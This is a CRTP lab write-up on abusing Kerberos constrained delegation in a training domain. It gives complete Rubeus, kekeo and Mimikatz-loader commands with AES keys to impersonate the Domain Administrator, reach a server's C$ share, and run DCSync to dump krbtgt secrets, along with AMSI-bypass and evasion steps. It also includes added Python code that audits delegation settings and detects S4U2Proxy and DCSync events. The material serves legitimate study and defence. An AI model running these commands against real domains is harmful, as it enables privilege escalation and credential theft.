# CRTP Lab 16

## Task 1

Enumerate **users** in the domain for whom Constrained Delegation is enabled.

* For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.
* Pass the ticket and access the service.

Use InviShell and PowerView to enumerate users with constrained delegation enabled.

```
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

PS C:\Users\student372> . C:\AD\Tools\PowerView.ps1

PS C:\Users\student372> Get-DomainUser -TrustedToAuth
```

websvc has constrained delegation enabled (to CIFS/dcorp-mssql). Since we already have the websvc credentials, we can use them to access CIFS/dcorp-mssql as Domain Administrator.

In the first hop (S4U2Self), websvc requests a TGS to itself on behalf of the Domain Administrator; in the second hop (S4U2Proxy) that ticket is exchanged for a TGS to the CIFS service, which is what we use to access it.

### Abuse with Rubeus

We use the websvc AES256 key to request a TGS as Domain Administrator from the KDC and inject it into the current session (/ptt).

{% code overflow="wrap" %}

```
# ArgSplit for "s4u"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

klist
```

{% endcode %}

Now we can access the CIFS service.

```
C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
```

### Abuse with Kekeo

Request a TGT for websvc using its AES256 key.

{% code overflow="wrap" %}

```
C:\Windows\system32>cd C:\AD\Tools\kekeo\x64

C:\AD\Tools\kekeo\x64>.\kekeo.exe

kekeo # tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7
```

{% endcode %}

We use this TGT to request a TGS (S4U) for cifs/dcorp-mssql on behalf of the Domain Administrator.

{% code overflow="wrap" %}

```
kekeo # tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL
```

{% endcode %}

kekeo writes the ticket to a .kirbi file, so we inject it into the current session to use it. Open InviShell, import Invoke-Mimi, and pass the ticket.

{% code overflow="wrap" %}

```
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
```

{% endcode %}

We can now access the CIFS service.

```
C:\AD\Tools\kekeo\x64>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$
```

## Task 2

Enumerate **computer** accounts in the domain for which Constrained Delegation is enabled.

* For such an account, request a TGT from the DC.
* Obtain an alternate TGS for the LDAP service on the target machine.
* Use the TGS for executing a DCSync attack.

We use InviShell and import PowerView to find computer accounts with constrained delegation enabled.

```
# InviShell and AMSI bypass, then PowerView:
PS C:\AD\Tools\kekeo\x64> . C:\AD\Tools\PowerView.ps1

# Enumerate Computers with Constrained Delegation enabled
PS C:\AD\Tools\kekeo\x64> Get-DomainComputer -TrustedToAuth
```

dcorp-adminsrv has constrained delegation enabled (to time/dcorp-dc). Since we have the AES keys of dcorp-adminsrv$, we use Rubeus to impersonate the Domain Administrator.
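The attributes that `Get-DomainUser -TrustedToAuth` and `Get-DomainComputer -TrustedToAuth` read in Task 1 and Task 2 can also be audited offline by a defender. The following is an added example, not part of the lab and not code from PowerView or Rubeus: it evaluates `userAccountControl` and `msDS-AllowedToDelegateTo` over constructed directory records that mirror the lab's websvc and dcorp-adminsrv$ configuration, and flags protocol transition, delegation targets that sit on a domain controller, and sensitive accounts that lack the "Account is sensitive and cannot be delegated" flag. The domain controller list and the sensitive-account list are assumptions for the example.

```python
"""Audit constrained-delegation settings from exported directory attributes.

Added example (not part of the lab, PowerView or Rubeus). The records below
are constructed to mirror the lab's findings; in a real audit they would come
from an LDAP export of userAccountControl and msDS-AllowedToDelegateTo.
"""

# userAccountControl bits (documented by Microsoft for Active Directory)
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "Account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition

# Constructed sample: the two delegating accounts from the lab, the account they
# impersonate, and a DC (which legitimately has unconstrained delegation).
SAMPLE_RECORDS = [
    {"sAMAccountName": "websvc", "objectClass": "user",
     "userAccountControl": 0x10200 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL"]},
    {"sAMAccountName": "dcorp-adminsrv$", "objectClass": "computer",
     "userAccountControl": 0x1000 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["time/dcorp-dc.dollarcorp.moneycorp.LOCAL"]},
    {"sAMAccountName": "Administrator", "objectClass": "user",
     "userAccountControl": 0x200, "msDS-AllowedToDelegateTo": []},
    {"sAMAccountName": "dcorp-dc$", "objectClass": "computer",
     "userAccountControl": 0x2000 | TRUSTED_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": []},
]

# Assumed domain controller hostnames and sensitive accounts (constructed policy).
DOMAIN_CONTROLLERS = {"dcorp-dc.dollarcorp.moneycorp.local"}
SENSITIVE_ACCOUNTS = {"Administrator"}


def spn_host(spn):
    """Return the lowercased host part of 'service/host[:port]'."""
    _, _, host = spn.partition("/")
    return host.split(":", 1)[0].lower()


def audit(records, dcs=DOMAIN_CONTROLLERS, sensitive=SENSITIVE_ACCOUNTS):
    """Return a list of (account, finding) tuples.

    protocol-transition   TRUSTED_TO_AUTH_FOR_DELEGATION is set, so the account
                          can obtain a ticket for any user via S4U2Self without
                          that user authenticating (what -TrustedToAuth lists).
    delegates-to-dc       an allowed SPN points at a domain controller; the
                          service name is in the unencrypted part of the ticket,
                          so any service on that host (e.g. LDAP) is reachable.
    sensitive-delegatable a sensitive account lacks NOT_DELEGATED and can
                          therefore be impersonated through delegation.
    """
    findings = []
    for rec in records:
        name = rec["sAMAccountName"]
        uac = rec["userAccountControl"]
        targets = rec.get("msDS-AllowedToDelegateTo", [])
        if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append((name, "protocol-transition"))
        for spn in targets:
            if spn_host(spn) in dcs:
                findings.append((name, "delegates-to-dc:" + spn))
        if name in sensitive and not uac & NOT_DELEGATED:
            findings.append((name, "sensitive-delegatable"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(SAMPLE_RECORDS):
        print(f"{account:18} {finding}")
```

Setting NOT_DELEGATED on Administrator (or adding it to Protected Users) makes the S4U2Self step in both tasks fail for that account, which is the check the last finding is pointing at.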

{% code overflow="wrap" %}

```
# ArgSplit for "s4u" (output in %Pwn%), then request the ticket with /altservice:ldap
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt
```

{% endcode %}

To abuse the LDAP ticket we just imported, we run DCSync to dump the krbtgt secrets.

{% code overflow="wrap" %}

```
# The service name in the ticket is not in the encrypted part, so /altservice let us
# replace TIME with LDAP (HTTP would work as well).
# ArgSplit for lsadump::dcsync (output in %Pwn%)

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"
```

{% endcode %}
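On the domain controller, the S4U2Proxy requests from Task 1 and Task 2 show up as event 4769 with the Transited Services field populated, and the DCSync step shows up as event 4662 with the replication control-access rights. The following is an added example, not part of the lab and not code from Rubeus, kekeo or Mimikatz: it runs over constructed events shaped like the EventData of those two event IDs and flags delegated tickets for a sensitive user, delegated tickets to a domain controller (where the service name can be rewritten, as Task 2 shows), replication rights exercised by an account other than a DC, and the chain of the two. The sensitive-user list, DC list and DC account names are assumptions; the event values are made up.

```python
"""Detect constrained-delegation abuse and DCSync in Windows Security events.

Added example (not part of the lab, Rubeus, kekeo or Mimikatz). The events are
constructed to mimic the EventData fields of 4769 (Kerberos service ticket
requested) and 4662 (operation performed on an object) on a domain controller.
"""

# Control-access-right GUIDs that directory replication (and DCSync) require.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

SENSITIVE_USERS = {"administrator"}                            # constructed policy
DOMAIN_CONTROLLERS = {"dcorp-dc.dollarcorp.moneycorp.local"}  # constructed
DC_ACCOUNTS = {"dcorp-dc$"}                                    # constructed

SAMPLE_EVENTS = [
    # 1. Ordinary TGS request by a user: TransitedServices is empty ("-").
    {"EventID": 4769, "TargetUserName": "student372@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "cifs/dcorp-mssql.dollarcorp.moneycorp.local",
     "TransitedServices": "-"},
    # 2. Task 1: websvc obtains a ticket for Administrator to cifs/dcorp-mssql.
    {"EventID": 4769, "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "cifs/dcorp-mssql.dollarcorp.moneycorp.local",
     "TransitedServices": "websvc@DOLLARCORP.MONEYCORP.LOCAL"},
    # 3. Task 2: dcorp-adminsrv$ obtains a ticket for Administrator to time/dcorp-dc.
    #    The KDC logs the SPN it issued; the LDAP rewrite happens client-side.
    {"EventID": 4769, "TargetUserName": "Administrator@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "time/dcorp-dc.dollarcorp.moneycorp.local",
     "TransitedServices": "dcorp-adminsrv$@DOLLARCORP.MONEYCORP.LOCAL"},
    # 4. Replication rights exercised by Administrator, which is not a DC: DCSync.
    {"EventID": 4662, "SubjectUserName": "Administrator",
     "Properties": "Control Access\n\t{%s}" % DS_REPLICATION_GET_CHANGES_ALL},
    # 5. Legitimate replication by a domain controller's own account.
    {"EventID": 4662, "SubjectUserName": "DCORP-DC$",
     "Properties": "Control Access\n\t{%s}" % DS_REPLICATION_GET_CHANGES},
]


def user_part(principal):
    """'Administrator@REALM' -> 'administrator'."""
    return principal.split("@", 1)[0].lower()


def spn_host(spn):
    """'time/dcorp-dc.domain:port' -> 'dcorp-dc.domain'."""
    return spn.partition("/")[2].split(":", 1)[0].lower()


def s4u2proxy_alerts(events):
    """Flag S4U2Proxy requests (4769 with TransitedServices set) that involve a
    sensitive user or a domain controller. Returns (user, reason) tuples."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4769 or ev.get("TransitedServices", "-") in ("", "-"):
            continue  # not a delegation request
        user = user_part(ev["TargetUserName"])
        if user in SENSITIVE_USERS:
            alerts.append((user, "delegated ticket for sensitive user via "
                           + user_part(ev["TransitedServices"])))
        if spn_host(ev["ServiceName"]) in DOMAIN_CONTROLLERS:
            alerts.append((user, "delegated ticket to a DC service; any service on "
                           "that host is reachable because the service name is unencrypted"))
    return alerts


def dcsync_alerts(events):
    """Flag 4662 events where an account other than a DC used replication rights."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        if not any(guid in props for guid in REPLICATION_RIGHTS):
            continue
        subject = ev["SubjectUserName"].lower()
        if subject in DC_ACCOUNTS:
            continue  # DCs replicate with each other; that is expected
        alerts.append((subject, "replication rights used by non-DC account"))
    return alerts


def delegation_then_dcsync(events):
    """Users who received a delegated ticket to a DC and then replicated."""
    delegated_to_dc = {u for u, r in s4u2proxy_alerts(events) if "to a DC service" in r}
    return {u for u, _ in dcsync_alerts(events) if u in delegated_to_dc}


if __name__ == "__main__":
    for alert in s4u2proxy_alerts(SAMPLE_EVENTS) + dcsync_alerts(SAMPLE_EVENTS):
        print("ALERT", *alert)
    print("delegation followed by DCSync:", delegation_then_dcsync(SAMPLE_EVENTS))
```

Because the altservice rewrite never reaches the KDC, the 4769 event for Task 2 records time/dcorp-dc rather than ldap/dcorp-dc; the DC-host check is therefore keyed on the host, not the service, and the 4662 replication event is what confirms how the ticket was actually used.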
